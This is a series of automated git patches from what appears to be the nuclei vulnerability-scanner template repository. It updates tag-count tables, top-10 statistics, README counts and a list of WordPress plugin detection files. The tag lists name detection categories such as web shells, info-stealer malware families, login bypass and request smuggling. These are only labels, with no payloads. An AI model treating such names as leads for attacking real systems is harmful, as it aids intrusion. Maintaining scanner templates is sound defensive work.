modoboa | 1 | | | | | | | | | +| internet-archive-account | 1 | | | | | | | | | +| mastodon-defcon | 1 | | | | | | | | | +| moonpay | 1 | | | | | | | | | +| defi | 1 | | | | | | | | | +| trackmanialadder | 1 | | | | | | | | | +| isecure | 1 | | | | | | | | | +| prismaweb | 1 | | | | | | | | | +| ocean-extra | 1 | | | | | | | | | +| aicloud | 1 | | | | | | | | | +| 3dtoday | 1 | | | | | | | | | +| our-freedom-book | 1 | | | | | | | | | +| skillshare | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| bokbot | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| photostation | 1 | | | | | | | | | +| tigase | 1 | | | | | | | | | +| slims | 1 | | | | | | | | | +| urls | 1 | | | | | | | | | +| csa | 1 | | | | | | | | | +| climatejusticerocks-mastodon-instance | 1 | | | | | | | | | +| ko-fi | 1 | | | | | | | | | +| activecollab | 1 | | | | | | | | | +| connectbox | 1 | | | | | | | | | +| directadmin | 1 | | | | | | | | | +| iclock | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| cloudrun | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| users-ultra | 1 | | | | | | | | | +| on-prem | 1 | | | | | | | | | +| wimkin-publicprofile | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| pieregister | 1 | | | | | | | | | +| bblog-ru | 1 | | | | | | | | | +| chaturbate | 1 | | | | | | | | | +| lobsters | 1 | | | | | | | | | +| smashrun | 1 | | | | | | | | | +| runcloud | 1 | | | | | | | | | +| hypertest | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| kasm | 1 | | | | | | | | | +| tugboat | 1 | | | | | | | | | +| jobs | 1 | | | | | | | | | +| advfn | 1 | | | | | | | | | +| bibliopac | 1 | | | | | | | | | +| n-media-woocommerce-checkout-fields | 1 | | | | | | | | | +| ddownload | 1 | | | | | | | | | +| speakout | 1 | | | | | | | | | +| mastonyc-mastodon-instance | 1 | | | | | | | | | +| ambassador | 1 | | | | | | | | | +| dwsync | 1 | | | | | | | | | +| hackaday | 1 | | | | | | | | | +| hanta | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| spx | 1 | | | | | | | | | +| jejapl | 1 | | | | | | | | | +| minecraft-list | 1 | | | | | | | | | +| ubisoft | 1 | | | | | | | | | +| onelogin | 1 | | | | | | | | | +| voidtools | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| mysqld | 1 | | | | | | | | | +| kramer | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| open-redirect | 1 | | | | | | | | | +| mx | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| macshell | 1 | | | | | | | | | +| sqlbuddy | 1 | | | | | | | | | +| hongjing | 1 | | | | | | | | | +| alumni | 1 | | | | | | | | | +| americanthinker | 1 | | | | | | | | | +| short.io | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| vklworld-mastodon-instance | 1 | | | | | | | | | +| perfsonar | 1 | | | | | | | | | +| showcase | 1 | | | | | | | | | +| txt | 1 | | | | | | | | | +| voicescom | 1 | | | | | | | | | +| defacement | 1 | | | | | | | | | +| multilaser | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| containers | 1 | | | | | | | | | +| ictprotege | 1 | | | | | | | | | +| wordcloud | 1 | | | | | | | | | +| npmjs | 1 | | | | | | | | | +| acf | 1 | | | | | | | | | +| adult-forum | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| domos | 1 | | | | | | | | | +| osghs | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| woo-bulk-price-update | 1 | | | | | | | | | +| verizon | 1 | | | | | | | | | +| bitquery | 1 | | | | | | | | | +| coinlayer | 1 | | | | | | | | | +| maipu | 1 | | | | | | | | | +| pie | 1 | | | | | | | | | +| tracing | 1 | | | | | | | | | +| ixbusweb | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| joomsport-sports-league-results-management | 1 | | | | | | | | | +| workspace | 1 | | | | | | | | | +| gnuboard5 | 1 | | | | | | | | | +| anobii | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| webshell4 | 1 | | | | | | | | | +| freelancer | 1 | | | | | | | | | +| macaddresslookup | 1 | | | | | | | | | +| nutanix | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| biqsdrive | 1 | | | | | | | | | +| phpnow | 1 | | | | | | | | | +| raddleme | 1 | | | | | | | | | +| pop3 | 1 | | | | | | | | | +| apteka | 1 | | | | | | | | | +| phpsec | 1 | | | | | | | | | +| smh | 1 | | | | | | | | | +| storybook | 1 | | | | | | | | | +| system | 1 | | | | | | | | | +| c4 | 1 | | | | | | | | | +| planon | 1 | | | | | | | | | +| ibax | 1 | | | | | | | | | +| badarg | 1 | | | | | | | | | +| pokerstrategy | 1 | | | | | | | | | +| scraperapi | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| facturascripts | 1 | | | | | | | | | +| checkmarx | 1 | | | | | | | | | +| storycorps | 1 | | | | | | | | | +| rsshub | 1 | | | | | | | | | +| mozilla | 1 | | | | | | | | | +| phplist | 1 | | | | | | | | | +| phoenix | 1 | | | | | | | | | +| obcs | 1 | | | | | | | | | +| noescape | 1 | | | | | | | | | +| macc2 | 1 | | | | | | | | | +| headers | 1 | | | | | | | | | +| slurm | 1 | | | | | | | | | +| breach-forums | 1 | | | | | | | | | +| smuggling | 1 | | | | | | | | | +| whois | 1 | | | | | | | | | +| weasyl | 1 | | | | | | | | | +| isams | 1 | | | | | | | | | +| lychee | 1 | | | | | | | | | +| etoro | 1 | | | | | | | | | +| pagerduty | 1 | | | | | | | | | +| zenrows | 1 | | | | | | | | | +| screenshotapi | 1 | | | | | | | | | +| registrationmagic | 1 | | | | | | | | | +| passwordmanager | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| machproweb | 1 | | | | | | | | | +| web-suite | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| h-sphere | 1 | | | | | | | | | +| mgrng | 1 | | | | | | | | | +| ejs | 1 | | | | | | | | | +| sslmate | 1 | | | | | | | | | +| revoked | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| rudloff | 1 | | | | | | | | | +| supervisor | 1 | | | | | | | | | +| html2pdf | 1 | | | | | | | | | +| route | 1 | | | | | | | | | +| xenforo | 1 | | | | | | | | | +| periscope | 1 | | | | | | | | | +| oxid | 1 | | | | | | | | | +| nearby | 1 | | | | | | | | | +| peoplesoft | 1 | | | | | | | | | +| nh | 1 | | | | | | | | | +| smartping | 1 | | | | | | | | | +| flatpm | 1 | | | | | | | | | +| teradek | 1 | | | | | | | | | +| scrutinizer | 1 | | | | | | | | | +| careerhabr | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| apolloadminservice | 1 | | | | | | | | | +| linktap | 1 | | | | | | | | | +| sassy | 1 | | | | | | | | | +| phpsocialnetwork | 1 | | | | | | | | | | bitcoin | 1 | | | | | | | | | | dailymotion | 1 | | | | | | | | | -| mobsf | 1 | | | | | | | | | -| pendinginstallvzw | 1 | | | | | | | | | -| patch | 1 | | | | | | | | | -| pingdom | 1 | | | | | | | | | -| openvz | 1 | | | | | | | | | -| feiyuxing | 1 | | | | | | | | | -| voice123 | 1 | | | | | | | | | -| eibiz | 1 | | | | | | | | | -| normhost | 1 | | | | | | | | | -| tracking | 1 | | | | | | | | | -| blitapp | 1 | | | | | | | | | -| eap | 1 | | | | | | | | | -| gdidees | 1 | | | | | | | | | -| identityguard | 1 | | | | | | | | | -| geocaching | 1 | | | | | | | | | -| admzip | 1 | | | | | | | | | -| mozilla | 1 | | | | | | | | | -| pagecdn | 1 | | | | | | | | | -| martech | 1 | | | | | | | | | -| agentejo | 1 | | | | | | | | | -| phpbb | 1 | | | | | | | | | -| fancentro | 1 | | | | | | | | | -| polarisft | 1 | | | | | | | | | -| moonpay | 1 | | | | | | | | | -| heylink | 1 | | | | | | | | | -| permissions | 1 | | | | | | | | | -| trane | 1 | | | | | | | | | -| karel | 1 | | | | | | | | | -| ftm | 1 | | | | | | | | | -| access | 1 | | | | | | | | | -| bscw | 1 | | | | | | | | | -| orcus | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| trino | 1 | | | | | | | | | -| bdsmlr | 1 | | | | | | | | | -| kodexplorer | 1 | | | | | | | | | -| hackster | 1 | | | | | | | | | +| drive | 1 | | | | | | | | | +| stats | 1 | | | | | | | | | +| exolis | 1 | | | | | | | | | +| securityspy | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| superwebmailer | 1 | | | | | | | | | +| concourse | 1 | | | | | | | | | +| mining | 1 | | | | | | | | | +| uservoice | 1 | | | | | | | | | +| deimos | 1 | | | | | | | | | +| ti-woocommerce-wishlist | 1 | | | | | | | | | +| xamr | 1 | | | | | | | | | +| webctrl | 1 | | | | | | | | | +| vivino | 1 | | | | | | | | | +| miconfig | 1 | | | | | | | | | +| quantum | 1 | | | | | | | | | | bikemap | 1 | | | | | | | | | -| airline-pilot-life | 1 | | | | | | | | | -| authorstream | 1 | | | | | | | | | -| nutanix | 1 | | | | | | | | | -| reprise | 1 | | | | | | | | | -| eventtickets | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| gira | 1 | | | | | | | | | -| lumis | 1 | | | | | | | | | -| popup-maker | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| mgrng | 1 | | | | | | | | | -| tagged | 1 | | | | | | | | | -| myfitnesspal-community | 1 | | | | | | | | | -| wowhead | 1 | | | | | | | | | -| rhadamanthys | 1 | | | | | | | | | -| mastodonbooksnet-mastodon-instance | 1 | | | | | | | | | -| gab | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| gumroad | 1 | | | | | | | | | -| homedesign3d | 1 | | | | | | | | | -| login-bypass | 1 | | | | | | | | | -| jupyterhub | 1 | | | | | | | | | -| scraperapi | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| domos | 1 | | | | | | | | | -| buttercms | 1 | | | | | | | | | -| phpsocialnetwork | 1 | | | | | | | | | -| tryhackme | 1 | | | | | | | | | -| teamwork | 1 | | | | | | | | | -| phoenix | 1 | | | | | | | | | -| sp-client-document-manager | 1 | | | | | | | | | -| miniorange | 1 | | | | | | | | | -| tcexam | 1 | | | | | | | | | -| freesound | 1 | | | | | | | | | -| sfd | 1 | | | | | | | | | -| jvm | 1 | | | | | | | | | -| wp-video-gallery-free | 1 | | | | | | | | | -| zblog | 1 | | | | | | | | | -| booth | 1 | | | | | | | | | -| roteador | 1 | | | | | | | | | -| orangehrm | 1 | | | | | | | | | -| geniusocean | 1 | | | | | | | | | -| www-xml-sitemap-generator-org | 1 | | | | | | | | | -| aflam | 1 | | | | | | | | | -| chopslider | 1 | | | | | | | | | -| rconfig.exposure | 1 | | | | | | | | | -| checkmarx | 1 | | | | | | | | | -| rss | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| chyoa | 1 | | | | | | | | | -| wpml | 1 | | | | | | | | | -| serialize | 1 | | | | | | | | | -| cafecito | 1 | | | | | | | | | -| caldotcom | 1 | | | | | | | | | -| patronite | 1 | | | | | | | | | -| golang | 1 | | | | | | | | | -| ctflearn | 1 | | | | | | | | | -| instructables | 1 | | | | | | | | | -| myspreadshop | 1 | | | | | | | | | -| adWidget | 1 | | | | | | | | | -| caa | 1 | | | | | | | | | -| loxone | 1 | | | | | | | | | -| gargoyle | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| atechmedia | 1 | | | | | | | | | -| librarything | 1 | | | | | | | | | -| atg | 1 | | | | | | | | | -| commerce | 1 | | | | | | | | | -| cmd | 1 | | | | | | | | | -| buzzfeed | 1 | | | | | | | | | -| kvm | 1 | | | | | | | | | -| allesovercrypto | 1 | | | | | | | | | -| mcuuid-minecraft | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| argussurveillance | 1 | | | | | | | | | -| caringbridge | 1 | | | | | | | | | -| gorest | 1 | | | | | | | | | -| webcenter | 1 | | | | | | | | | -| mastodon-mstdnio | 1 | | | | | | | | | -| public | 1 | | | | | | | | | -| petfinder | 1 | | | | | | | | | -| master-elements | 1 | | | | | | | | | -| viaware | 1 | | | | | | | | | -| hc-custom-wp-admin-url | 1 | | | | | | | | | -| badarg | 1 | | | | | | | | | -| gravatar | 1 | | | | | | | | | -| mastodon-101010pl | 1 | | | | | | | | | -| homeautomation | 1 | | | | | | | | | -| tos | 1 | | | | | | | | | -| wms | 1 | | | | | | | | | -| uid | 1 | | | | | | | | | -| archibus | 1 | | | | | | | | | -| phpnow | 1 | | | | | | | | | -| osu | 1 | | | | | | | | | -| exchangerateapi | 1 | | | | | | | | | +| insanejournal | 1 | | | | | | | | | +| getresponse | 1 | | | | | | | | | +| dvdFab | 1 | | | | | | | | | +| shortcode | 1 | | | | | | | | | +| flyway | 1 | | | | | | | | | +| thegatewaypundit | 1 | | | | | | | | | +| cults3d | 1 | | | | | | | | | +| acemanager | 1 | | | | | | | | | +| mdm | 1 | | | | | | | | | +| fortressaircraft | 1 | | | | | | | | | | placeos | 1 | | | | | | | | | -| accent | 1 | | | | | | | | | -| pop3 | 1 | | | | | | | | | -| prismatic | 1 | | | | | | | | | -| finance | 1 | | | | | | | | | -| backpack | 1 | | | | | | | | | -| streetview | 1 | | | | | | | | | -| playsms | 1 | | | | | | | | | -| blueiris | 1 | | | | | | | | | -| ilch | 1 | | | | | | | | | -| skyrock | 1 | | | | | | | | | -| securenvoy | 1 | | | | | | | | | -| ecosys | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| flir-ax8 | 1 | | | | | | | | | -| gn-publisher | 1 | | | | | | | | | -| oas | 1 | | | | | | | | | -| calendar | 1 | | | | | | | | | -| cloudron | 1 | | | | | | | | | -| charity | 1 | | | | | | | | | +| speedrun | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| websheets | 1 | | | | | | | | | +| uid | 1 | | | | | | | | | +| zenserp | 1 | | | | | | | | | +| quip | 1 | | | | | | | | | +| designspriation | 1 | | | | | | | | | +| wishpond | 1 | | | | | | | | | +| dwr | 1 | | | | | | | | | +| watchmemorecom | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| tildezone-mastodon-instance | 1 | | | | | | | | | +| wireclub | 1 | | | | | | | | | +| hcl | 1 | | | | | | | | | +| olt | 1 | | | | | | | | | +| ifunny | 1 | | | | | | | | | +| citybook | 1 | | | | | | | | | +| spiderfoot | 1 | | | | | | | | | +| totalwar | 1 | | | | | | | | | +| mediakits | 1 | | | | | | | | | +| jcms | 1 | | | | | | | | | +| depop | 1 | | | | | | | | | +| memrise | 1 | | | | | | | | | +| 7cup | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| admidio | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| bigo-live | 1 | | | | | | | | | +| cd-action | 1 | | | | | | | | | +| mixlr | 1 | | | | | | | | | +| soup | 1 | | | | | | | | | +| imagements | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| secmail | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| intel | 1 | | | | | | | | | +| chromium | 1 | | | | | | | | | +| tox | 1 | | | | | | | | | +| cloudera | 1 | | | | | | | | | +| sentinel | 1 | | | | | | | | | +| adc | 1 | | | | | | | | | +| codementor | 1 | | | | | | | | | +| webroot | 1 | | | | | | | | | +| fuel-cms | 1 | | | | | | | | | +| indegy | 1 | | | | | | | | | +| opgg | 1 | | | | | | | | | +| cucm | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| questdb | 1 | | | | | | | | | +| netvibes | 1 | | | | | | | | | +| bibliosoft | 1 | | | | | | | | | +| maestro | 1 | | | | | | | | | +| oki | 1 | | | | | | | | | +| poll-everywhere | 1 | | | | | | | | | +| bunpro | 1 | | | | | | | | | +| panda | 1 | | | | | | | | | +| hugo | 1 | | | | | | | | | +| huemagic | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| fontsy | 1 | | | | | | | | | +| supportcandy | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| booth | 1 | | | | | | | | | +| anyproxy | 1 | | | | | | | | | +| ctflearn | 1 | | | | | | | | | +| analytics | 1 | | | | | | | | | +| syncthing | 1 | | | | | | | | | +| ncbi | 1 | | | | | | | | | +| multisafepay | 1 | | | | | | | | | +| nsicg | 1 | | | | | | | | | +| webcenter | 1 | | | | | | | | | +| dotcards | 1 | | | | | | | | | +| rustici | 1 | | | | | | | | | +| mediation | 1 | | | | | | | | | +| tripadvisor | 1 | | | | | | | | | +| oembed | 1 | | | | | | | | | +| protocol | 1 | | | | | | | | | +| download-monitor | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| sls | 1 | | | | | | | | | +| kubecost | 1 | | | | | | | | | +| openedx | 1 | | | | | | | | | +| locations | 1 | | | | | | | | | +| issuu | 1 | | | | | | | | | +| clockify | 1 | | | | | | | | | +| pcoweb | 1 | | | | | | | | | +| taxonomies-change-checkbox-to-radio-buttons | 1 | | | | | | | | | +| appsmith | 1 | | | | | | | | | +| wpa | 1 | | | | | | | | | +| blogger | 1 | | | | | | | | | +| steller | 1 | | | | | | | | | +| mylot | 1 | | | | | | | | | +| hcommonssocial-mastodon-instance | 1 | | | | | | | | | +| shardingsphere | 1 | | | | | | | | | +| hivequeue | 1 | | | | | | | | | +| justforfans | 1 | | | | | | | | | +| envoy | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| arris | 1 | | | | | | | | | +| bacnet | 1 | | | | | | | | | +| mingyu | 1 | | | | | | | | | +| ubiquiti | 1 | | | | | | | | | +| media-server | 1 | | | | | | | | | +| mercurial | 1 | | | | | | | | | +| 21buttons | 1 | | | | | | | | | +| details | 1 | | | | | | | | | +| tbk | 1 | | | | | | | | | +| daily-prayer-time-for-mosques | 1 | | | | | | | | | +| tutorlms | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| fastvue | 1 | | | | | | | | | +| ilovegrowingmarijuana | 1 | | | | | | | | | +| venmo | 1 | | | | | | | | | +| quiz | 1 | | | | | | | | | +| grandnode | 1 | | | | | | | | | +| genie | 1 | | | | | | | | | | historianssocial-mastodon-instance | 1 | | | | | | | | | -| faktopedia | 1 | | | | | | | | | -| limit | 1 | | | | | | | | | -| acketstorm | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| gurock | 1 | | | | | | | | | -| jgraph | 1 | | | | | | | | | -| suprema | 1 | | | | | | | | | -| orbiteam | 1 | | | | | | | | | -| cdi | 1 | | | | | | | | | -| opensource | 1 | | | | | | | | | -| yishaadmin | 1 | | | | | | | | | -| palnet | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| qmail | 1 | | | | | | | | | +| vertex | 1 | | | | | | | | | +| duolingo | 1 | | | | | | | | | +| teamwork | 1 | | | | | | | | | +| qizhi | 1 | | | | | | | | | +| hiberworld | 1 | | | | | | | | | +| management | 1 | | | | | | | | | +| f3 | 1 | | | | | | | | | +| msmswitch | 1 | | | | | | | | | +| netbeans | 1 | | | | | | | | | +| libretoothgr-mastodon-instance | 1 | | | | | | | | | +| pendo | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| zerodium | 1 | | | | | | | | | +| goip | 1 | | | | | | | | | +| rijksmuseum | 1 | | | | | | | | | +| inkbunny | 1 | | | | | | | | | +| interpals | 1 | | | | | | | | | +| sfd | 1 | | | | | | | | | +| blind-ssrf | 1 | | | | | | | | | +| moduweb | 1 | | | | | | | | | +| guard | 1 | | | | | | | | | +| register | 1 | | | | | | | | | +| qlik | 1 | | | | | | | | | +| brandfolder | 1 | | | | | | | | | +| teamtreehouse | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| kraken | 1 | | | | | | | | | +| diablo | 1 | | | | | | | | | +| donation-alerts | 1 | | | | | | | | | +| maillist | 1 | | | | | | | | | +| mastodonbooksnet-mastodon-instance | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| mystic-stealer | 1 | | | | | | | | | +| pdi | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index a69421dfd3..4b9d8d5e7e 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 2033 | dhiyaneshdk | 1053 | http | 6290 | info | 3199 | file | 309 | -| panel | 980 | dwisiswant0 | 798 | file | 309 | high | 1283 | dns | 17 | -| wordpress | 827 | daffainfo | 787 | workflows | 190 | medium | 1261 | | | -| exposure | 781 | pikpikcu | 353 | network | 116 | critical | 765 | | | -| xss | 720 | pussycat0x | 288 | ssl | 25 | low | 229 | | | -| wp-plugin | 717 | pdteam | 282 | dns | 17 | unknown | 29 | | | -| osint | 669 | ritikchaddha | 247 | headless | 9 | | | | | -| tech | 627 | ricardomaia | 221 | TEMPLATES-STATS.json | 1 | | | | | +| cve | 2054 | dhiyaneshdk | 1056 | http | 6342 | info | 3217 | file | 309 | +| panel | 985 | dwisiswant0 | 798 | file | 309 | high | 1288 | dns | 17 | +| wordpress | 831 | daffainfo | 787 | workflows | 191 | medium | 1270 | | | +| exposure | 784 | pikpikcu | 353 | network | 116 | critical | 785 | | | +| xss | 726 | pussycat0x | 289 | ssl | 26 | low | 230 | | | +| wp-plugin | 721 | pdteam | 283 | dns | 17 | unknown | 29 | | | +| osint | 672 | ritikchaddha | 259 | headless | 9 | | | | | +| tech | 632 | ricardomaia | 225 | TEMPLATES-STATS.json | 1 | | | | | | edb | 598 | geeknik | 221 | contributors.json | 1 | | | | | -| lfi | 585 | theamanrawat | 179 | cves.json | 1 | | | | | +| lfi | 587 | 0x_akoko | 179 | cves.json | 1 | | | | | From 2ef9b5fedf9702c97a9b0f208307350ba3d50b5c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 11 Sep 2023 14:53:50 +0000 Subject: [PATCH 0288/1090] Auto README Update [Mon Sep 11 14:53:50 UTC 2023] :robot: --- README.md | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index 2dd76e7315..52cbb93694 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 2033 | dhiyaneshdk | 1053 | http | 6290 | info | 3199 | file | 309 | -| panel | 980 | dwisiswant0 | 798 | file | 309 | high | 1283 | dns | 17 | -| wordpress | 827 | daffainfo | 787 | workflows | 190 | medium | 1261 | | | -| exposure | 781 | pikpikcu | 353 | network | 116 | critical | 765 | | | -| xss | 720 | pussycat0x | 288 | ssl | 25 | low | 229 | | | -| wp-plugin | 717 | pdteam | 282 | dns | 17 | unknown | 29 | | | -| osint | 669 | ritikchaddha | 247 | headless | 9 | | | | | -| tech | 627 | ricardomaia | 221 | TEMPLATES-STATS.json | 1 | | | | | +| cve | 2054 | dhiyaneshdk | 1056 | http | 6342 | info | 3217 | file | 309 | +| panel | 985 | dwisiswant0 | 798 | file | 309 | high | 1288 | dns | 17 | +| wordpress | 831 | daffainfo | 787 | workflows | 191 | medium | 1270 | | | +| exposure | 784 | pikpikcu | 353 | network | 116 | critical | 785 | | | +| xss | 726 | pussycat0x | 289 | ssl | 26 | low | 230 | | | +| wp-plugin | 721 | pdteam | 283 | dns | 17 | unknown | 29 | | | +| osint | 672 | ritikchaddha | 259 | headless | 9 | | | | | +| tech | 632 | ricardomaia | 225 | TEMPLATES-STATS.json | 1 | | | | | | edb | 598 | geeknik | 221 | contributors.json | 1 | | | | | -| lfi | 585 | theamanrawat | 179 | cves.json | 1 | | | | | +| lfi | 587 | 0x_akoko | 179 | cves.json | 1 | | | | | -**482 directories, 7197 files**. +**487 directories, 7254 files**. From cf6526147489d02fce06ed6b497ee9da5bedb7a7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 12 Sep 2023 04:02:06 +0000 Subject: [PATCH 0289/1090] Auto WordPress Plugins Update [Tue Sep 12 04:02:06 UTC 2023] :robot: --- helpers/wordpress/plugins/duplicate-page.txt | 2 +- helpers/wordpress/plugins/google-site-kit.txt | 2 +- helpers/wordpress/plugins/header-footer-elementor.txt | 2 +- helpers/wordpress/plugins/kadence-blocks.txt | 2 +- helpers/wordpress/plugins/malcare-security.txt | 2 +- helpers/wordpress/plugins/megamenu.txt | 2 +- helpers/wordpress/plugins/wp-statistics.txt | 2 +- helpers/wordpress/plugins/wpvivid-backuprestore.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - 